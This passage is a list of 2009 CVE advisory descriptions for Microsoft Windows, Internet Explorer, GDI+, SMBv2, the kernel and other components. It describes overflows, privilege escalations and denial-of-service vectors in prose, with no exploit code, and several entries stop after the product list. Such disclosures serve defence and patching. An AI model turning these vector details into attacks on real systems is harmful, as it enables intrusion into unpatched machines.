denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, aka "SMBv2 Negotiation Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2009-3020] win32k.sys in Microsoft Windows Server 2003 SP2 allows remote attackers to cause a denial of service (system crash) by referencing a crafted .eot file in the src descriptor of an @font-face Cascading Style Sheets (CSS) rule in an HTML document, possibly related to the Embedded OpenType (EOT) Font Engine, a different vulnerability than CVE-2006-0010, CVE-2009-0231, and CVE-2009-0232. NOTE: some of these details are obtained from third party information. [CVE-2009-3019] Microsoft Internet Explorer 6 on Windows XP SP2 and SP3, and Internet Explorer 7 on Vista, allows remote attackers to cause a denial of service (application crash) via JavaScript code that calls createElement to create an instance of the LI element, and then calls setAttribute to set the value attribute. [CVE-2009-2764] Microsoft Internet Explorer 8.0.7100.0 on Windows 7 RC on the x64 platform allows remote attackers to cause a denial of service (application crash) via a certain DIV element in conjunction with SCRIPT elements that have empty contents and no reference to a valid external script location. [CVE-2009-2655] mshtml.dll in Microsoft Internet Explorer 7 and 8 on Windows XP SP3 allows remote attackers to cause a denial of service (application crash) by calling the JavaScript findText method with a crafted Unicode string in the first argument, and only one additional argument, as demonstrated by a second argument of -1. [CVE-2009-2653] DISPUTED The NtUserConsoleControl function in win32k.sys in Microsoft Windows XP SP2 and SP3, and Server 2003 before SP1, allows local administrators to bypass unspecified "security software" and gain privileges via a crafted call that triggers an overwrite of an arbitrary memory location. NOTE: the vendor disputes the significance of this report, stating that 'the Administrator to SYSTEM "escalation" is not a security boundary we defend.' [CVE-2009-2544] Directory traversal vulnerability in the Marcelo Costa FileServer component 1.0 for Microsoft Windows Live Messenger and Messenger Plus! Live (MPL) allows remote authenticated users to list arbitrary directories and read arbitrary files via a .. (dot dot) in a pathname. [CVE-2009-2532] Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC do not properly process the command value in an SMB Multi-Protocol Negotiate Request packet, which allows remote attackers to execute arbitrary code via a crafted SMBv2 packet to the Server service, aka "SMBv2 Command Value Vulnerability." [CVE-2009-2527] Heap-based buffer overflow in Microsoft Windows Media Player 6.4 allows remote attackers to execute arbitrary code via (1) a crafted ASF file or (2) crafted streaming content, aka "WMP Heap Overflow Vulnerability." [CVE-2009-2526] Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 do not properly validate fields in SMBv2 packets, which allows remote attackers to cause a denial of service (infinite loop and system hang) via a crafted packet to the Server service, aka "SMBv2 Infinite Loop Vulnerability." [CVE-2009-2525] Microsoft Windows Media Runtime, as used in DirectShow WMA Voice Codec, Windows Media Audio Voice Decoder, and Audio Compression Manager (ACM), does not properly initialize unspecified functions within compressed audio files, which allows remote attackers to execute arbitrary code via (1) a crafted media file or (2) crafted streaming content, aka "Windows Media Runtime Heap Corruption Vulnerability." [CVE-2009-2524] Integer underflow in the NTLM authentication feature in the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to cause a denial of service (reboot) via a malformed packet, aka "Local Security Authority Subsystem Service Integer Overflow Vulnerability." [CVE-2009-2519] The DHTML Editing Component ActiveX control in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly format HTML markup, which allows remote attackers to execute arbitrary code via a crafted web site that triggers "system state" corruption, aka "DHTML Editing Component ActiveX Control Vulnerability." [CVE-2009-2517] The kernel in Microsoft Windows Server 2003 SP2 does not properly handle unspecified exceptions when an error condition occurs, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Exception Handler Vulnerability." [CVE-2009-2516] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold and SP1, and Server 2008 Gold does not properly validate data sent from user mode, which allows local users to gain privileges via a crafted PE .exe file that triggers a NULL pointer dereference during chain traversal, aka "Windows Kernel NULL Pointer Dereference Vulnerability." [CVE-2009-2515] Integer underflow in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows local users to gain privileges via a crafted application that triggers an incorrect truncation of a 64-bit integer to a 32-bit integer, aka "Windows Kernel Integer Underflow Vulnerability." [CVE-2009-2514] win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not correctly parse font code during construction of a directory-entry table, which allows remote attackers to execute arbitrary code via a crafted Embedded OpenType (EOT) font, aka "Win32k EOT Parsing Vulnerability." [CVE-2009-2513] The Graphics Device Interface (GDI) in win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Insufficient Data Validation Vulnerability." [CVE-2009-2511] Integer overflow in the CryptoAPI component in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows man-in-the-middle attackers to spoof arbitrary SSL servers and other entities via an X.509 certificate that has a malformed ASN.1 Object Identifier (OID) and was issued by a legitimate Certification Authority, aka "Integer Overflow in X.509 Object Identifiers Vulnerability." [CVE-2009-2510] The CryptoAPI component in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, as used by Internet Explorer and other applications, does not properly handle a '\0' character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, aka "Null Truncation in X.509 Common Name Vulnerability," a related issue to CVE-2009-2408. [CVE-2009-2509] Active Directory Federation Services (ADFS) in Microsoft Windows Server 2003 SP2 and Server 2008 Gold and SP2 does not properly validate headers in HTTP requests, which allows remote authenticated users to execute arbitrary code via a crafted request to an IIS web server, aka "Remote Code Execution in ADFS Vulnerability." [CVE-2009-2508] The single sign-on implementation in Active Directory Federation Services (ADFS) in Microsoft Windows Server 2003 SP2 and Server 2008 Gold and SP2 does not properly remove credentials at the end of a network session, which allows physically proximate attackers to obtain the credentials of a previous user of the same web browser by using data from the browser's cache, aka "Single Sign On Spoofing in ADFS Vulnerability." [CVE-2009-2507] A certain ActiveX control in the Indexing Service in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly process URLs, which allows remote attackers to execute arbitrary programs via unspecified vectors that cause a "vulnerable binary" to load and run, aka "Memory Corruption in Indexing Service Vulnerability." [CVE-2009-2505] The Internet Authentication Service (IAS) in Microsoft Windows Vista SP2 and Server 2008 SP2 does not properly validate MS-CHAP v2 Protected Extensible Authentication Protocol (PEAP) authentication requests, which allows remote attackers to execute arbitrary code via crafted structures in a malformed request, aka "Internet Authentication Service Memory Corruption Vulnerability." [CVE-2009-2504] Multiple integer overflows in unspecified APIs in GDI+ in Microsoft .NET Framework 1.1 SP1, .NET Framework 2.0 SP1 and SP2, Windows XP SP2 and SP3, Windows Server 2003 SP2, Vista Gold and SP1, Server 2008 Gold, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allow remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "GDI+ .NET API Vulnerability." [CVE-2009-2503] GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Windows Server 2003 SP2, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 does not properly allocate an unspecified buffer, which allows remote attackers to execute arbitrary code via a crafted TIFF image file that triggers memory corruption, aka "GDI+ TIFF Memory Corruption Vulnerability." [CVE-2009-2502] Buffer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted TIFF image file, aka "GDI+ TIFF Buffer Overflow Vulnerability." [CVE-2009-2501] Heap-based buffer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted PNG image file, aka "GDI+ PNG Heap Overflow Vulnerability." [CVE-2009-2500] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted WMF image file, aka "GDI+ WMF Integer Overflow Vulnerability." [CVE-2009-2499] Microsoft Windows Media Format Runtime 9.0, 9.5, and 11 [CVE-2009-2498] Microsoft Windows Media Format Runtime 9.0, 9.5, and 11 and Windows Media Services 9.1 and 2008 do not properly parse malformed headers in Advanced Systems Format (ASF) files, which allows remote attackers to execute arbitrary code via a crafted (1) .asf, (2) .wmv, or (3) .wma file, aka "Windows Media Header Parsing Invalid Free Vulnerability." [CVE-2009-2494] The Active Template Library (ATL) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via vectors related to erroneous free operations after reading a variant from a stream and deleting this variant, aka "ATL Object Type Mismatch Vulnerability." [CVE-2009-2484] Stack-based buffer overflow in the Win32AddConnection function in modules/access/smb.c in VideoLAN VLC media player 0.9.9, when running on Microsoft Windows, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long smb URI in a playlist file. [CVE-2009-2357] The default configuration of TekRADIUS 3.0 uses the sa account to communicate with Microsoft SQL Server, which makes it easier for remote attackers to obtain privileged access to the database and the underlying Windows operating system. [CVE-2009-1930] The Telnet service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote Telnet servers to execute arbitrary code on a client machine by replaying the NTLM credentials of a client user, aka "Telnet Credential Reflection Vulnerability," a related issue to CVE-2000-0834. [CVE-2009-1929] Heap-based buffer overflow in the Microsoft Terminal Services Client ActiveX control running RDP 6.1 on Windows XP SP2, Vista SP1 or SP2, or Server 2008 Gold or SP2 [CVE-2009-1928] Stack consumption vulnerability in the LDAP service in Active Directory on Microsoft Windows 2000 SP4, Server 2003 SP2, and Server 2008 Gold and SP2 [CVE-2009-1926] Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to cause a denial of service (TCP outage) via a series of TCP sessions that have pending data and a (1) small or (2) zero receive window size, and remain in the FIN-WAIT-1 or FIN-WAIT-2 state indefinitely, aka "TCP/IP Orphaned Connections Vulnerability." [CVE-2009-1925] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 does not properly manage state information, which allows remote attackers to execute arbitrary code by sending packets to a listening service, and thereby triggering misinterpretation of an unspecified field as a function pointer, aka "TCP/IP Timestamps Code Execution Vulnerability." [CVE-2009-1924] Integer overflow in the Windows Internet Name Service (WINS) component for Microsoft Windows 2000 SP4 allows remote WINS replication partners to execute arbitrary code via crafted data structures in a packet, aka "WINS Integer Overflow Vulnerability." [CVE-2009-1923] Heap-based buffer overflow in the Windows Internet Name Service (WINS) component for Microsoft Windows 2000 SP4 and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted WINS replication packet that triggers an incorrect buffer-length calculation, aka "WINS Heap Overflow Vulnerability." [CVE-2009-1922] The Message Queuing (aka MSMQ) service for Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP2, and Vista Gold does not properly validate unspecified IOCTL request data from user mode before passing this data to kernel mode, which allows local users to gain privileges via a crafted request, aka "MSMQ Null Pointer Vulnerability." [CVE-2009-1920] The JScript scripting engine 5.1, 5.6, 5.7, and 5.8 in JScript.dll in Microsoft Windows, as used in Internet Explorer, does not properly load decoded scripts into memory before execution, which allows remote attackers to execute arbitrary code via a crafted web site that triggers memory corruption, aka "JScript Remote Code Execution Vulnerability." [CVE-2009-1808] Microsoft Windows XP SP3 allows local users to cause a denial of service (system crash) by making an SPI_SETDESKWALLPAPER SystemParametersInfo call with an improperly terminated pvParam argument, followed by an SPI_GETDESKWALLPAPER SystemParametersInfo call. [CVE-2009-1761] The message engine in CA ARCserve Backup r12.0 and r12.0 SP1 for Windows allows remote attackers to cause a denial of service (crash) via (1) an invalid 0x13 message, which is not properly handled in the ASCORE module, or (2) a 0x3B message with invalid stub data that triggers an RPC marshalling error. [CVE-2009-1546] Integer overflow in Avifil32.dll in the Windows Media file handling functionality in Microsoft Windows allows remote attackers to execute arbitrary code on a Windows 2000 SP4 system via a crafted AVI file, or cause a denial of service on a Windows XP SP2 or SP3, Server 2003 SP2, Vista Gold, SP1, or SP2, or Server 2008 Gold or SP2 system via a crafted AVI file, aka "AVI Integer Overflow Vulnerability." [CVE-2009-1545] Unspecified vulnerability in Avifil32.dll in the Windows Media file handling functionality in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a malformed header in a crafted AVI file, aka "Malformed AVI Header Vulnerability." [CVE-2009-1539] The QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 does not properly validate unspecified size fields in QuickTime media files, which allows remote attackers to execute arbitrary code via a crafted file, aka "DirectX Size Validation Vulnerability." [CVE-2009-1538] The QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 performs updates to pointers without properly validating unspecified data values, which allows remote attackers to execute arbitrary code via a crafted QuickTime media file, aka "DirectX Pointer Validation Vulnerability." [CVE-2009-1537] Unspecified vulnerability in the QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted QuickTime media file, as exploited in the wild in May 2009, aka "DirectX NULL Byte Overwrite Vulnerability." [CVE-2009-1533] Buffer overflow in the Works for Windows document converters in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP3, Office 2007 SP1, and Works 8.5 and 9 allows remote attackers to execute arbitrary code via a crafted Works .wps file that triggers memory corruption, aka "File Converter Buffer Overflow Vulnerability." [CVE-2009-1532] Microsoft Internet Explorer 8 for Windows XP SP2 and SP3 [CVE-2009-1531] Microsoft Internet Explorer 7 for Windows XP SP2 and SP3 [CVE-2009-1530] Use-after-free vulnerability in Microsoft Internet Explorer 7 for Windows XP SP2 and SP3 [CVE-2009-1529] Microsoft Internet Explorer 7 for Windows XP SP2 and SP3 [CVE-2009-1528] Microsoft Internet Explorer 6 and 7 for Windows XP SP2 and SP3 [CVE-2009-1511] GDI+ in Microsoft Windows XP SP3 allows remote attackers to cause a denial of service (infinite loop) via a PNG file that contains a certain large btChunkLen value. [CVE-2009-1335] Microsoft Internet Explorer 7 and 8 on Windows XP and Vista allows remote attackers to cause a denial of service (application hang) via a large document composed of unprintable characters, aka MSRC 9011jr. [CVE-2009-1331] Integer overflow in Microsoft Windows Media Player (WMP) 11.0.5721.5260 allows remote attackers to cause a denial of service (application crash) via a crafted .mid file, as demonstrated by crash.mid. [CVE-2009-1217] Off-by-one error in the GpFont::SetData function in gdiplus.dll in Microsoft GDI+ on Windows XP allows remote attackers to cause a denial of service (stack corruption and application termination) via a crafted EMF file that triggers an integer overflow, as demonstrated by voltage-exploit.emf, aka the "Microsoft GdiPlus EMF GpFont.SetData integer overflow." [CVE-2009-1216] Multiple unspecified vulnerabilities in (1) unlzh.c and (2) unpack.c in the gzip libraries in Microsoft Windows Server 2008, Windows Services for UNIX 3.0 and 3.5, and the Subsystem for UNIX-based Applications (SUA) [CVE-2009-1141] Microsoft Internet Explorer 6 for Windows XP SP2 and SP3 and Server 2003 SP2 allows remote attackers to execute arbitrary code via unspecified DHTML function calls related to a tr element and the "insertion, deletion and attributes of a table cell," which trigger memory corruption when the window is destroyed, aka "DHTML Object Memory Corruption Vulnerability." [CVE-2009-1139] Memory leak in the LDAP service in Active Directory on Microsoft Windows 2000 SP4 and Server 2003 SP2, and Active Directory Application Mode (ADAM) on Windows XP SP2 and SP3 and Server 2003 SP2, allows remote attackers to cause a denial of service (memory consumption and service outage) via (1) LDAP or (2) LDAPS requests with unspecified OID filters, aka "Active Directory Memory Leak Vulnerability." [CVE-2009-1138] The LDAP service in Active Directory on Microsoft Windows 2000 SP4 does not properly free memory for LDAP and LDAPS requests, which allows remote attackers to execute arbitrary code via a request that uses hexadecimal encoding, whose associated memory is not released, related to a "DN AttributeValue," aka "Active Directory Invalid Free Vulnerability." NOTE: this issue is probably a memory leak. [CVE-2009-1133] Heap-based buffer overflow in Microsoft Remote Desktop Connection (formerly Terminal Services Client) running RDP 5.0 through 6.1 on Windows, and Remote Desktop Connection Client for Mac 2.0, allows remote attackers to execute arbitrary code via unspecified parameters, aka "Remote Desktop Connection Heap Overflow Vulnerability." [CVE-2009-1132] Heap-based buffer overflow in the Wireless LAN AutoConfig Service (aka Wlansvc) in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a malformed wireless frame, aka "Wireless Frame Parsing Remote Code Execution Vulnerability." [CVE-2009-1127] win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not correctly validate an argument to an unspecified system call, which allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, aka "Win32k NULL Pointer Dereferencing Vulnerability." [CVE-2009-1126] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly validate the user-mode input associated with the editing of an unspecified desktop parameter, which allows local users to gain privileges via a crafted application, aka "Windows Desktop Parameter Edit Vulnerability." [CVE-2009-1125] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate an argument to an unspecified system call, which allows local users to gain privileges via a crafted application, aka "Windows Driver Class Registration Vulnerability." [CVE-2009-1124] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate user-mode pointers in unspecified error conditions, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Pointer Validation Vulnerability." [CVE-2009-1123] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate changes to unspecified kernel objects, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Desktop Vulnerability." [CVE-2009-1122] The WebDAV extension in Microsoft Internet Information Services (IIS) 5.0 on Windows 2000 SP4 does not properly decode URLs, which allows remote attackers to bypass authentication, and possibly read or create files, via a crafted HTTP request, aka "IIS 5.0 WebDAV Authentication Bypass Vulnerability," a different vulnerability than CVE-2009-1535. [CVE-2009-1043] Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to execute arbitrary code via unknown vectors triggered by clicking on a link, as demonstrated by Nils during a PWN2OWN competition at CanSecWest 2009. [CVE-2009-0555] Microsoft Windows Media Runtime, as used in DirectShow WMA Voice Codec, Windows Media Audio Voice Decoder, and Audio Compression Manager (ACM), does not properly process Advanced Systems Format (ASF) files, which allows remote attackers to execute arbitrary code via a crafted audio file that uses the Windows Media Speech codec, aka "Windows Media Runtime Voice Sample Rate Vulnerability." [CVE-2009-0554] Microsoft Internet Explorer 5.01 SP4, 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0553] Microsoft Internet Explorer 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0552] Unspecified vulnerability in Microsoft Internet Explorer 5.01 SP4, 6 SP1, 6 on Windows XP SP2 and SP3, and 6 on Windows Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0551] Microsoft Internet Explorer 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 does not properly handle transition errors in a request for one HTTP document followed by a request for a second HTTP document, which allows remote attackers to execute arbitrary code via vectors involving (1) multiple crafted pages on a web site or (2) a web page with crafted inline content such as banner advertisements, aka "Page Transition Memory Corruption Vulnerability." [CVE-2009-0550] Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 [CVE-2009-0341] The shell32 module in Microsoft Internet Explorer 7.0 on Windows XP SP3 might allow remote attackers to execute arbitrary code via a long VALUE attribute in an INPUT element, possibly related to a stack consumption vulnerability. [CVE-2009-0320] Microsoft Windows XP, Server 2003 and 2008, and Vista exposes I/O activity measurements of all processes, which allows local users to obtain sensitive information, as demonstrated by reading the I/O Other Bytes column in Task Manager (aka taskmgr.exe) to estimate the number of characters that a different user entered at a runas.exe password prompt, related to a "benchmarking attack." [CVE-2009-0244] Directory traversal vulnerability in the OBEX FTP Service in the Microsoft Bluetooth stack in Windows Mobile 6 Professional, and probably Windows Mobile 5.0 for Pocket PC and 5.0 for Pocket PC Phone Edition, allows remote authenticated users to list arbitrary directories, and create or read arbitrary files, via a .. (dot dot) in a pathname. NOTE: this can be leveraged for code execution by writing to a Startup folder. [CVE-2009-0243] Microsoft Windows does not properly enforce the Autorun and NoDriveTypeAutoRun registry values, which allows physically proximate attackers to execute arbitrary code by (1) inserting CD-ROM media, (2) inserting DVD media, (3) connecting a USB device, and (4) connecting a Firewire device [CVE-2009-0239] Cross-site scripting (XSS) vulnerability in Windows Search 4.0 for Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows user-assisted remote attackers to inject arbitrary web script or HTML via a crafted file that appears in a preview in a search result, aka "Script Execution in Windows Search Vulnerability." [CVE-2009-0235] Stack-based buffer overflow in the Word 97 text converter in WordPad in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted Word 97 file that triggers memory corruption, related to use of inconsistent integer data sizes for an unspecified length field, aka "WordPad Word 97 Text Converter Stack Overflow Vulnerability." [CVE-2009-0234] The DNS Resolver Cache Service (aka DNSCache) in Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008 does not properly cache crafted DNS responses, which makes it easier for remote attackers to predict transaction IDs and poison caches by sending many crafted DNS queries that trigger "unnecessary lookups," aka "DNS Server Response Validation Vulnerability." [CVE-2009-0233] The DNS Resolver Cache Service (aka DNSCache) in Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008, when dynamic updates are enabled, does not reuse cached DNS responses in all applicable situations, which makes it easier for remote attackers to predict transaction IDs and poison caches by simultaneously sending crafted DNS queries and responses, aka "DNS Server Query Validation Vulnerability." [CVE-2009-0232] Integer overflow in the Embedded OpenType (EOT) Font Engine in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted name table, aka "Embedded OpenType Font Integer Overflow Vulnerability." [CVE-2009-0231] The Embedded OpenType (EOT) Font Engine (T2EMBED.DLL) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted name table in a data record that triggers an integer truncation and a heap-based buffer overflow, aka "Embedded OpenType Font Heap Overflow Vulnerability." [CVE-2009-0229] The Windows Printing Service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 allows local users to read arbitrary files via a crafted separator page, aka "Print Spooler Read File Vulnerability." [CVE-2009-0202] Array index error in FL21WIN.DLL in the PowerPoint Freelance Windows 2.1 Translator in Microsoft PowerPoint 2000 and 2002 allows remote attackers to execute arbitrary code via a Freelance file with unspecified "layout information" that triggers a heap-based buffer overflow. [CVE-2009-0119] Buffer overflow in Microsoft Windows XP SP3 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via a crafted .chm file. [CVE-2009-0094] The WINS server in Microsoft Windows 2000 SP4 and Server 2003 SP1 and SP2 does not restrict registration of the (1) "wpad" and (2) "isatap" NetBIOS names, which allows remote authenticated users to hijack the Web Proxy Auto-Discovery (WPAD) and Intra-Site Automatic Tunnel Addressing Protocol (ISATAP) features, and conduct man-in-the-middle attacks by spoofing a proxy server or ISATAP route, by registering one of these names in the WINS database, aka "WPAD WINS Server Registration Vulnerability," a related issue to CVE-2007-1692. [CVE-2009-0093] Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008, when dynamic updates are enabled, does not restrict registration of the "wpad" hostname, which allows remote authenticated users to hijack the Web Proxy Auto-Discovery (WPAD) feature, and conduct man-in-the-middle attacks by spoofing a proxy server, via a Dynamic Update request for this hostname, aka "DNS Server Vulnerability in WPAD Registration Vulnerability," a related issue to CVE-2007-1692. [CVE-2009-0089] Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, and Vista Gold allows remote web servers to impersonate arbitrary https web sites by using DNS spoofing to "forward a connection" to a different https web site that has a valid certificate matching its own domain name, but not a certificate matching the domain name of the host requested by the user, aka "Windows HTTP Services Certificate Name Mismatch Vulnerability." [CVE-2009-0087] Unspecified vulnerability in the Word 6 text converter in WordPad in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 [CVE-2009-0086] Integer underflow in Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 